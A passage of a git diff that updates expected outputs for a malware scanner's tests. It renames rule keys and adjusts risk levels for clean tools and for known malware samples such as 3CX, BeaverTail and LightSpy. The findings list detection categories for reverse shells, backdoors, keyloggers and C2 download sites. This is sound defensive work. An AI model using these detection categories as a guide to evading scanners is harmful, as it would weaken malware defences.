[ipv6=addr](https://github.com/search?q=ipv6%3Daddr&type=code) | | MEDIUM | [discover/network/interface_list](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-list.yara#bsd_ifaddrs) | list network interfaces | [freeifaddrs](https://github.com/search?q=freeifaddrs&type=code)
[getifaddrs](https://github.com/search?q=getifaddrs&type=code) | -| MEDIUM | [discover/system/network](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/system_network.yara#sys_net_recon) | collects system and network information | [id](https://github.com/search?q=id&type=code)
[ipv4=addr](https://github.com/search?q=ipv4%3Daddr&type=code)
[ipv6=addr](https://github.com/search?q=ipv6%3Daddr&type=code) | | MEDIUM | [net/ip/addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/addr.yara#ip_addr) | mentions an 'IP address' | [IP address](https://github.com/search?q=IP+address&type=code) | | MEDIUM | [net/ip/icmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/icmp.yara#ping) | Uses the ping tool to generate ICMP packets | [ping -6 -N](https://github.com/search?q=ping+-6+-N&type=code)
[ping broadcast](https://github.com/search?q=ping+broadcast&type=code)
[ping does not fragment](https://github.com/search?q=ping+does+not+fragment&type=code)
[ping for user must be](https://github.com/search?q=ping+for+user+must+be&type=code)
[ping session](https://github.com/search?q=ping+session&type=code)
[ping statistics ---](https://github.com/search?q=ping+statistics+---&type=code) | | MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) | | MEDIUM | [net/ip/string](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-string.yara#inet_ntoa) | [converts IP address from byte to string](https://linux.die.net/man/3/inet_ntoa) | [inet_ntoa](https://github.com/search?q=inet_ntoa&type=code)
[inet_ntop](https://github.com/search?q=inet_ntop&type=code) | | MEDIUM | [net/socket/raw](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/raw.yara#raw_sockets) | [send raw and/or malformed IP packets](https://man7.org/linux/man-pages/man7/raw.7.html) | [SOCK_RAW](https://github.com/search?q=SOCK_RAW&type=code)
[raw socket](https://github.com/search?q=raw+socket&type=code) | -| LOW | [discover/network/interface_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-get.yara#bsd_if) | get network interfaces by name or index | [if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) | +| LOW | [discover/network/interface](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface.yara#bsd_if) | get network interfaces by name or index | [if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) | | LOW | [net/ip/multicast_send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-multicast-send.yara#multicast) | [send data to multiple nodes simultaneously](https://en.wikipedia.org/wiki/IP_multicast) | [multicast](https://github.com/search?q=multicast&type=code) | | LOW | [net/ip/send_unicast](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-send-unicast.yara#unicast) | send data to the internet | [unicast](https://github.com/search?q=unicast&type=code) | | LOW | [net/resolve/hostport_parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostport-parse.yara#getaddrinfo) | Network address and service translation | [freeaddrinfo](https://github.com/search?q=freeaddrinfo&type=code)
[getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) | diff --git a/tests/linux/clean/pulumi.simple b/tests/linux/clean/pulumi.simple index e1f07cb35..287705b9f 100644 --- a/tests/linux/clean/pulumi.simple +++ b/tests/linux/clean/pulumi.simple @@ -40,8 +40,8 @@ discover/group/lookup: medium discover/network/mac_address: medium discover/process/parent: low discover/processes/list: medium -discover/system/cpu_info: low -discover/system/hostname_get: low +discover/system/cpu: low +discover/system/hostname: low discover/system/platform: medium discover/system/sysinfo: medium discover/user/HOME: low diff --git a/tests/linux/clean/pypi_package_index.json.simple b/tests/linux/clean/pypi_package_index.json.simple index e75f5caf3..cb5c63bb8 100644 --- a/tests/linux/clean/pypi_package_index.json.simple +++ b/tests/linux/clean/pypi_package_index.json.simple @@ -101,7 +101,7 @@ discover/network/interface_list: medium discover/network/netstat: medium discover/processes/list: medium discover/processes/pgrep: medium -discover/system/cpu_info: low +discover/system/cpu: low discover/system/machine_id: low discover/system/platform: low discover/system/sysinfo: medium diff --git a/tests/linux/clean/qemu-system-xtensa.md b/tests/linux/clean/qemu-system-xtensa.md index d59d71b9d..94ebbe1ec 100644 --- a/tests/linux/clean/qemu-system-xtensa.md +++ b/tests/linux/clean/qemu-system-xtensa.md @@ -59,6 +59,7 @@ | LOW | [data/hash/md5](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/md5.yara#MD5) | Uses the MD5 signature format | [md5:](https://github.com/search?q=md5%3A&type=code) | | LOW | [data/hash/sha256](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha256.yara#SHA256) | Uses the SHA256 signature format | [SHA256_](https://github.com/search?q=SHA256_&type=code) | | LOW | [discover/process/parent](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | +| LOW | [discover/system/dmesg](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/dmesg.yara#dmesg) | accesses the kernel log ring buffer | [dmesg](https://github.com/search?q=dmesg&type=code) | | LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | | LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | LOW | [evasion/logging/acct](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/logging/acct.yara#acct) | switch process accounting on or off | [acct](https://github.com/search?q=acct&type=code) | diff --git a/tests/linux/clean/rules.json.simple b/tests/linux/clean/rules.json.simple index c8ae90917..6e31704e3 100644 --- a/tests/linux/clean/rules.json.simple +++ b/tests/linux/clean/rules.json.simple @@ -21,7 +21,8 @@ data/compression/bzip2: low data/compression/lzma: low data/compression/zstd: low data/encoding/base64: low -discover/system/network: medium +discover/multiple: medium +discover/system/dmesg: low discover/system/platform: low discover/user/name_get: medium evasion/bypass_security/linux/iptables: medium diff --git a/tests/linux/clean/searchindex.json.simple b/tests/linux/clean/searchindex.json.simple index 38d2ee056..61d126494 100644 --- a/tests/linux/clean/searchindex.json.simple +++ b/tests/linux/clean/searchindex.json.simple @@ -1,4 +1,4 @@ -# linux/clean/searchindex.json: high +# linux/clean/searchindex.json: medium 3P/threat_hunting/dd: medium 3P/threat_hunting/keylogger: medium anti-static/obfuscation/obfuscate: low @@ -40,7 +40,7 @@ fs/watch: low impact/exploit: medium impact/infection/infected: medium impact/remote_access/agent: medium -impact/remote_access/backdoor: high +impact/remote_access/backdoor: medium impact/remote_access/reverse_shell: medium impact/remote_access/trojan: medium impact/rootkit: medium diff --git a/tests/linux/clean/slack.md b/tests/linux/clean/slack.md index d21573c90..961ab3556 100644 --- a/tests/linux/clean/slack.md +++ b/tests/linux/clean/slack.md @@ -106,9 +106,9 @@ | LOW | [data/encoding/json_encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/json-encode.yara#JSONEncode) | encodes JSON | [JSON.stringify](https://github.com/search?q=JSON.stringify&type=code) | | LOW | [data/hash/sha1](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha1.yara#SHA1) | Uses the SHA1 signature format | [SHA1_](https://github.com/search?q=SHA1_&type=code) | | LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [srand](https://github.com/search?q=srand&type=code) | -| LOW | [discover/network/interface_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-get.yara#bsd_if) | get network interfaces by name or index | [if_indextoname](https://github.com/search?q=if_indextoname&type=code)
[if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) | +| LOW | [discover/network/interface](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface.yara#bsd_if) | get network interfaces by name or index | [if_indextoname](https://github.com/search?q=if_indextoname&type=code)
[if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) | | LOW | [discover/process/parent](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | -| LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | +| LOW | [discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | | LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | LOW | [evasion/hijack_execution/LD_LIBRARY_PATH](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hijack_execution/LD_LIBRARY_PATH.yara#ld_library_path) | ld library path | [LD_LIBRARY_PATH](https://github.com/search?q=LD_LIBRARY_PATH&type=code) | diff --git a/tests/linux/clean/slirp4netns.simple b/tests/linux/clean/slirp4netns.simple index 29b5561f0..f64d4c66c 100644 --- a/tests/linux/clean/slirp4netns.simple +++ b/tests/linux/clean/slirp4netns.simple @@ -10,7 +10,7 @@ discover/group/lookup: medium discover/network/interface_list: medium discover/network/mac_address: medium discover/process/parent: low -discover/system/dev_full: medium +discover/system/dev_full: low discover/system/platform: low discover/system/sysinfo: medium discover/user/HOME: low diff --git a/tests/linux/clean/sudo.simple b/tests/linux/clean/sudo.simple index 11c1f7965..e1de0184e 100644 --- a/tests/linux/clean/sudo.simple +++ b/tests/linux/clean/sudo.simple @@ -2,8 +2,8 @@ credential/password: low discover/network/interface_list: medium discover/process/parent: low -discover/system/cpu_info: low -discover/system/hostname_get: low +discover/system/cpu: low +discover/system/hostname: low discover/user/HOME: low evasion/file/location/var_tmp: medium evasion/file/prefix: medium diff --git a/tests/linux/clean/trivy.simple b/tests/linux/clean/trivy.simple index c75e6ce7c..90b8d4846 100644 --- a/tests/linux/clean/trivy.simple +++ b/tests/linux/clean/trivy.simple @@ -55,8 +55,9 @@ discover/network/mac_address: medium discover/network/netstat: medium discover/process/name: medium discover/processes/list: medium -discover/system/cpu_info: low -discover/system/hostname_get: low +discover/system/cpu: low +discover/system/dmesg: low +discover/system/hostname: low discover/system/platform: medium discover/system/sysinfo: medium discover/user/HOME: low diff --git a/tests/linux/clean/trufflehog.md b/tests/linux/clean/trufflehog.md index 84d5c2ff3..8389c0d6f 100644 --- a/tests/linux/clean/trufflehog.md +++ b/tests/linux/clean/trufflehog.md @@ -2,7 +2,7 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--------|-------------------------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| HIGH | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_php_url_with_question) | contains hardcoded endpoint with a question mark | [https://api.mesibo.com/api.php?op=useradd&token=https](https://api.mesibo.com/api.php?op=useradd&token=https)
[https://api.route4me.com/api.v4/address_book.php?api_key=https](https://api.route4me.com/api.v4/address_book.php?api_key=https)
[https://api.websitepulse.com/textserver.php?method=GetContacts&username=](https://api.websitepulse.com/textserver.php?method=GetContacts&username=)
[https://us1.locationiq.com/v1/reverse.php?key=https](https://us1.locationiq.com/v1/reverse.php?key=https) | +| HIGH | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_url_with_question) | binary contains hardcoded URL with question mark | [https://api.mesibo.com/api.php?op=useradd&token=https](https://api.mesibo.com/api.php?op=useradd&token=https)
[https://api.route4me.com/api.v4/address_book.php?api_key=https](https://api.route4me.com/api.v4/address_book.php?api_key=https)
[https://api.websitepulse.com/textserver.php?method=GetContacts&username=](https://api.websitepulse.com/textserver.php?method=GetContacts&username=)
[https://us1.locationiq.com/v1/reverse.php?key=https](https://us1.locationiq.com/v1/reverse.php?key=https) | | HIGH | [c2/tool_transfer/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/download.yara#download_sites) | [References known file hosting site](https://github.com/ditekshen/detection/blob/e6579590779f62cbe7f5e14b5be7d77b2280f516/yara/indicator_high.yar#L1001) | [pastebin.Scanner](https://github.com/search?q=pastebin.Scanner&type=code)
[pastebin.com/api/api_post](https://github.com/search?q=pastebin.com%2Fapi%2Fapi_post&type=code)
[pastebin.go](https://github.com/search?q=pastebin.go&type=code)
[pastebin.init](https://github.com/search?q=pastebin.init&type=code) | | HIGH | [c2/tool_transfer/grayware](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/grayware.yara#grayware_sites) | References websites that host code that can be used maliciously | [shodan.io](https://github.com/search?q=shodan.io&type=code) | | HIGH | [discover/ip/public](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/ip/public_ip.yara#iplookup_website) | public service to discover external IP address | [ipify.or](https://github.com/search?q=ipify.or&type=code) | @@ -116,8 +116,8 @@ | LOW | [discover/cloud/google_metadata](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/cloud/google-metadata.yara#google_metadata) | Includes the token required to use the Google Cloud Platform metadata server | [Metadata-Flavor](https://github.com/search?q=Metadata-Flavor&type=code) | | LOW | [discover/cloud/google_storage](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/cloud/google-storage.yara#go_import) | Capable of using Google Cloud Storage (GCS) | [cloud.google.com/go/storage](https://github.com/search?q=cloud.google.com%2Fgo%2Fstorage&type=code) | | LOW | [discover/process/parent](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | -| LOW | [discover/system/cpu_info](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/cpu-info.yara#processor_count) | [gets number of processors](https://man7.org/linux/man-pages/man3/get_nprocs.3.html) | [nproc](https://github.com/search?q=nproc&type=code) | -| LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [/proc/sys/kernel/hostname](https://github.com/search?q=%2Fproc%2Fsys%2Fkernel%2Fhostname&type=code) | +| LOW | [discover/system/cpu](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/cpu.yara#processor_count) | [gets number of processors](https://man7.org/linux/man-pages/man3/get_nprocs.3.html) | [nproc](https://github.com/search?q=nproc&type=code) | +| LOW | [discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [/proc/sys/kernel/hostname](https://github.com/search?q=%2Fproc%2Fsys%2Fkernel%2Fhostname&type=code) | | LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [syscall.Uname](https://github.com/search?q=syscall.Uname&type=code)
[uname](https://github.com/search?q=uname&type=code) | | LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | diff --git a/tests/linux/clean/wolfictl.simple b/tests/linux/clean/wolfictl.simple index b0708c44b..519799bc3 100644 --- a/tests/linux/clean/wolfictl.simple +++ b/tests/linux/clean/wolfictl.simple @@ -45,8 +45,9 @@ discover/network/interface_list: medium discover/network/mac_address: medium discover/network/netstat: medium discover/processes/pgrep: medium -discover/system/cpu_info: low -discover/system/hostname_get: low +discover/system/cpu: low +discover/system/dmesg: low +discover/system/hostname: low discover/system/platform: medium discover/system/sysinfo: medium discover/user/HOME: low diff --git a/tests/macOS/2023.3CX/libffmpeg.change_decrease.mdiff b/tests/macOS/2023.3CX/libffmpeg.change_decrease.mdiff index 4103bb6b07683ee18884603a1261365db3b59e05..a7aea48048a772c5b09cbd65156b2810978f8887 100644 GIT binary patch delta 33 pcmaE}jp@xcrVUcDlc&dtPEJTPo}3oTKe;m2Y+?Y%=Jm0AZ2|n;4mtn; delta 36 qcmaE}jp@xcrVUcDEb-~7C6g!G+fR;+m0-~YaSCJ2Hm{G}YYPAw3=Y=- diff --git a/tests/macOS/2023.3CX/libffmpeg.change_increase.mdiff b/tests/macOS/2023.3CX/libffmpeg.change_increase.mdiff index 61fe8e8c7..db9788ce8 100644 --- a/tests/macOS/2023.3CX/libffmpeg.change_increase.mdiff +++ b/tests/macOS/2023.3CX/libffmpeg.change_increase.mdiff @@ -37,7 +37,7 @@ | +LOW | **[data/compression/gzip](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/gzip.yara#gzip)** | [works with gzip files](https://www.gnu.org/software/gzip/) | [gzip](https://github.com/search?q=gzip&type=code) | | +LOW | **[data/encoding/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64)** | Supports base64 encoded strings | [base64](https://github.com/search?q=base64&type=code) | | +LOW | **[data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand)** | [generate random numbers insecurely](https://man.openbsd.org/rand) | [_rand](https://github.com/search?q=_rand&type=code)
[srand](https://github.com/search?q=srand&type=code) | -| +LOW | **[discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname)** | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | +| +LOW | **[discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname)** | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | | +LOW | **[discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME)** | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | +LOW | **[exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM)** | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) | | +LOW | **[fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir)** | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | diff --git a/tests/macOS/2023.3CX/libffmpeg.decrease.mdiff b/tests/macOS/2023.3CX/libffmpeg.decrease.mdiff index 4103bb6b07683ee18884603a1261365db3b59e05..a7aea48048a772c5b09cbd65156b2810978f8887 100644 GIT binary patch delta 33 pcmaE}jp@xcrVUcDlc&dtPEJTPo}3oTKe;m2Y+?Y%=Jm0AZ2|n;4mtn; delta 36 qcmaE}jp@xcrVUcDEb-~7C6g!G+fR;+m0-~YaSCJ2Hm{G}YYPAw3=Y=- diff --git a/tests/macOS/2023.3CX/libffmpeg.dirty.mdiff b/tests/macOS/2023.3CX/libffmpeg.dirty.mdiff index 61fe8e8c7..db9788ce8 100644 --- a/tests/macOS/2023.3CX/libffmpeg.dirty.mdiff +++ b/tests/macOS/2023.3CX/libffmpeg.dirty.mdiff @@ -37,7 +37,7 @@ | +LOW | **[data/compression/gzip](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/gzip.yara#gzip)** | [works with gzip files](https://www.gnu.org/software/gzip/) | [gzip](https://github.com/search?q=gzip&type=code) | | +LOW | **[data/encoding/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64)** | Supports base64 encoded strings | [base64](https://github.com/search?q=base64&type=code) | | +LOW | **[data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand)** | [generate random numbers insecurely](https://man.openbsd.org/rand) | [_rand](https://github.com/search?q=_rand&type=code)
[srand](https://github.com/search?q=srand&type=code) | -| +LOW | **[discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname)** | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | +| +LOW | **[discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname)** | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | | +LOW | **[discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME)** | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | +LOW | **[exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM)** | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) | | +LOW | **[fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir)** | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | diff --git a/tests/macOS/2023.3CX/libffmpeg.increase.mdiff b/tests/macOS/2023.3CX/libffmpeg.increase.mdiff index 61fe8e8c7..db9788ce8 100644 --- a/tests/macOS/2023.3CX/libffmpeg.increase.mdiff +++ b/tests/macOS/2023.3CX/libffmpeg.increase.mdiff @@ -37,7 +37,7 @@ | +LOW | **[data/compression/gzip](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/gzip.yara#gzip)** | [works with gzip files](https://www.gnu.org/software/gzip/) | [gzip](https://github.com/search?q=gzip&type=code) | | +LOW | **[data/encoding/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64)** | Supports base64 encoded strings | [base64](https://github.com/search?q=base64&type=code) | | +LOW | **[data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand)** | [generate random numbers insecurely](https://man.openbsd.org/rand) | [_rand](https://github.com/search?q=_rand&type=code)
[srand](https://github.com/search?q=srand&type=code) | -| +LOW | **[discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname)** | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | +| +LOW | **[discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname)** | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | | +LOW | **[discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME)** | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | +LOW | **[exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM)** | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) | | +LOW | **[fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir)** | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | diff --git a/tests/macOS/2024.BeaverTail/client_5346.py.simple b/tests/macOS/2024.BeaverTail/client_5346.py.simple index 1a44a30ed..71e1b84c2 100644 --- a/tests/macOS/2024.BeaverTail/client_5346.py.simple +++ b/tests/macOS/2024.BeaverTail/client_5346.py.simple @@ -5,6 +5,7 @@ data/encoding/base64: low discover/system/platform: medium discover/user/HOME: low evasion/file/prefix: medium +evasion/indicator_blocking/hidden_window: medium evasion/indicator_blocking/mask_exceptions: medium exec/imports/python: medium exec/install_additional/pip_install: high diff --git a/tests/macOS/2024.Ezuri/libdpt1.so.simple b/tests/macOS/2024.Ezuri/libdpt1.so.simple index 5851a1c32..65223eaba 100644 --- a/tests/macOS/2024.Ezuri/libdpt1.so.simple +++ b/tests/macOS/2024.Ezuri/libdpt1.so.simple @@ -3,7 +3,7 @@ anti-static/macho/footer: high anti-static/packer/aes: high anti-static/packer/ezuri: critical crypto/aes: low -discover/system/cpu_info: low +discover/system/cpu: low exec/plugin: low exec/program: medium fs/file/read: low diff --git a/tests/macOS/2024.LightSpy/dropper.simple b/tests/macOS/2024.LightSpy/dropper.simple index 292c43b62..a1eedf707 100644 --- a/tests/macOS/2024.LightSpy/dropper.simple +++ b/tests/macOS/2024.LightSpy/dropper.simple @@ -6,9 +6,9 @@ c2/tool_transfer/macos: critical crypto/aes: low crypto/xor: high data/hash/md5: medium +discover/multiple: high discover/process/name: medium -discover/system/cpu_info: low -discover/system/network: high +discover/system/cpu: low discover/system/platform: medium evasion/file/location/pidfile: high exec/dylib/symbol_address: medium diff --git a/tests/macOS/2024.Rustdoor/localfile.simple b/tests/macOS/2024.Rustdoor/localfile.simple index 7ac915779..f5189151e 100644 --- a/tests/macOS/2024.Rustdoor/localfile.simple +++ b/tests/macOS/2024.Rustdoor/localfile.simple @@ -15,15 +15,16 @@ crypto/aes: low data/compression/gzip: low data/compression/zstd: low data/embedded/zstd: medium -discover/network/interface_get: low -discover/system/cpu_info: medium 